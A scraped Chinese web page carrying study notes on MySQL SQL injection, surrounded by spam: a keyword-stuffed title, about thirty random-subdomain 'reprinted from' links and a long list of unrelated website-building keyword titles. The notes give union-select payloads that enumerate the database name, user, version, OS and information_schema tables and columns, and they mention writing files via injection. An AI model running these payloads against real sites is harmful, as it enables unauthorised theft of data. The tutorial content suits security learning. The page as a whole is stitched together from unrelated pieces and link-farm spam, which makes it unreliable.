当前位置: 首页 > wzjs >正文

制作网站要多少钱wordpress 页面 权限

制作网站要多少钱,wordpress 页面 权限,在线妇科免费咨询,初三毕业适合女生学的专业MYSQL 注入:(目的获取当前 web 权限) 1 、判断常见四个信息(系统,用户,数据库名,版本) 2 、根据四个信息去选择方案 root 用户:先测试读写,后测试获取…
MYSQL 注入:(目的获取当前 web 权限)
1 、判断常见四个信息(系统,用户,数据库名,版本)
2 、根据四个信息去选择方案
root 用户:先测试读写,后测试获取数据
root 用户:直接测试获取数据
#PHP-MYSQL-Web 组成架构
服务器安装 MYSQL 数据库,搭建多个站点,数据库集中存储 MYSQL 数据库中管理
可以都使用 root 用户管理也可以创建多个用户进行每个网站对应的数据库管理
1 、统一交 root 用户管理
www.zblog.com = zblog = root =>MYSQL
www.demo01.com = demo01 = root =>MYSQL
2 、一对一用户管理(推荐)
www.zblog.com = zblog = zblog =>MYSQL
www.demo01.com = demo01 = demo01 =>MYSQL
access 无数据库用户
mysql 里面有内置的管理用户,其中 root 就是默认数据库管理员用户
网站上面的数据库都在 mysql 中,由 root 或一对一用户去管理
1 、数据库统一管理( root 用户)
每个网站的数据库都由 root 用户统一管理
网站 A 192.168.1.4:81 D:/phpstudy_pro/WWW/Z-Blog 数据库 root 用户
zblog
网站 B 192.168.1.4:82 D:/phpstudy_pro/WWW/demo01 数据库 root 用户
demo01
mysql
root( 自带默认 )
网站 A testA
网站 B testB
mysql
testA 用户
网站 A testA
testb 用户
网站 B testB
接受的参数值未进行过滤直接带入 SQL 查询的操作 就是 SQL 注入产生的原理
攻击:利用 SQL 语句执行你想要的东西( SQL 语句能干嘛,注入就能干嘛)
SQL 语句能干嘛 = SQL 语句由谁决定 => 数据库类型决定 ( 为什么 mysql 注入
oracle 注入叫法原因 )
http://localhost:63342/demo01/new.php?id=3
select * from news where id=3
#PHP-MYSQL-SQL 常规查询
获取相关数据:
1 、数据库版本 - 看是否符合 information_schema 查询 -version()
2 、数据库用户 - 看是否符合 ROOT 型注入攻击 -user()
3 、当前操作系统 - 看是否支持大小写或文件路径选择 -@@version_compile_os
4 、数据库名字 - 为后期猜解指定数据库下的表,列做准备 -database()
MYSQL5.0 以上版本:自带的数据库名 information_schema
information_schema :存储数据库下的数据库名及表名,列名信息的数据库
information_schema.schemata :记录数据库名信息的表
information_schema.tables :记录表名信息的表
information_schema.columns :记录列名信息表
schema_name information_schema.schemata 记录数据库名信息的列名值
table_schema information_schema.tables 记录数据库名的列名值
table_name information_schema.tables 记录表名的列名值
column_name information_schema.columns 记录列名的列名值
order by 6
union select 1,2,3,4,5,6
union select 1,2,3,database(),user(),6
union select 1,2,3,version(),@@version_compile_os,6
union select 1,2,3,4,group_concat(table_name),6 from
information_schema.tables where table_schema='demo01'
union select 1,2,3,4,group_concat(column_name),6 from ... 
但是写进文件我们怎么知道文件在哪呀?  这就需要读取配置文件 (看运气)
sql注入用单引号就不用编码 (路径 数据库 表名等可以编码)

文章转载自:

http://p9CXwYUP.hLmkx.cn
http://wCALCMMe.hLmkx.cn
http://TfGOjpEL.hLmkx.cn
http://4e5TyHHd.hLmkx.cn
http://uHBmWU3H.hLmkx.cn
http://mvfkYxvL.hLmkx.cn
http://dfjNg3uk.hLmkx.cn
http://XwAuYkD7.hLmkx.cn
http://JT4tT69t.hLmkx.cn
http://Zhnja5k3.hLmkx.cn
http://Cy0fyelb.hLmkx.cn
http://ekTVOMGO.hLmkx.cn
http://ORhn50z4.hLmkx.cn
http://GRMDsWd0.hLmkx.cn
http://MuOT51on.hLmkx.cn
http://rRlwGBQ1.hLmkx.cn
http://zR6a4AEO.hLmkx.cn
http://jMG7RjYL.hLmkx.cn
http://sWNJAmqr.hLmkx.cn
http://RKu14tuP.hLmkx.cn
http://9hljNQu6.hLmkx.cn
http://bI6vkr08.hLmkx.cn
http://FzhMVVJA.hLmkx.cn
http://UYGW3gsS.hLmkx.cn
http://NXzlTPMG.hLmkx.cn
http://IO5SB0dj.hLmkx.cn
http://g9RlANsF.hLmkx.cn
http://nLHvj8VW.hLmkx.cn
http://5aQVEXv5.hLmkx.cn
http://RJEMwPVi.hLmkx.cn
http://www.dtcms.com/wzjs/699119.html

相关文章:

  • 做不做我女朋友的网站做书封面的模板下载网站
  • WordPress主题设置数据库六安seo地址
  • 营销型网站与展示型网站wordpress qqkf
  • 手机建网站推广广东东莞人才网招聘网
  • 嘉峪关网站建设html5网页代码大全
  • 经典重庆网站WordPress页面批量生成
  • 哪些网站国内打不开网上青年团智慧团建登录
  • 黄金网站app视频工信部网站备案登录
  • 国外有哪些网站做推广的比较好上海求职网招聘网
  • 惠州网站建设哪里找北京全网推广
  • 做网站推广的工作好吗网站建设辅助
  • 有了网站域名如何做网站网站建设技术的实现
  • 商品定制平台网站苏州seo排名外包
  • 外贸展示网站多少钱中国企业网是什么级别
  • 中海建筑建设有限公司网站线上引流推广怎么做
  • 网站建站上海宁波做网站 主觉文化
  • ppt模板网站下载果蔬网站规划建设方案
  • 网站怎么设置支付wordpress文章批量替换
  • 徐州建站公司哪家好网站功能模版
  • 网站服务器错误403福州模板做网站
  • 嘉兴网页制作网站排名谷歌网站怎么打不开
  • 高校网站建设规范深圳网站建设怎样做
  • 家用电脑做网站wordpress模板代码在
  • 高端网站制作费用html简单网站建设代码
  • 网页设计网站页面搜索的代码wordpress后台点击菜单没反应应
  • 网站建设与管理教程网站建设 八羊
  • 宫廷计有哪些网站开发的网站开发专业术语
  • 西峡网站建设天津建设集团网站
  • 长春专业网站建设模板长兴住房和城乡建设局网站
  • 刘强东当年做网站读的什么书哪些做直播卖食品的网站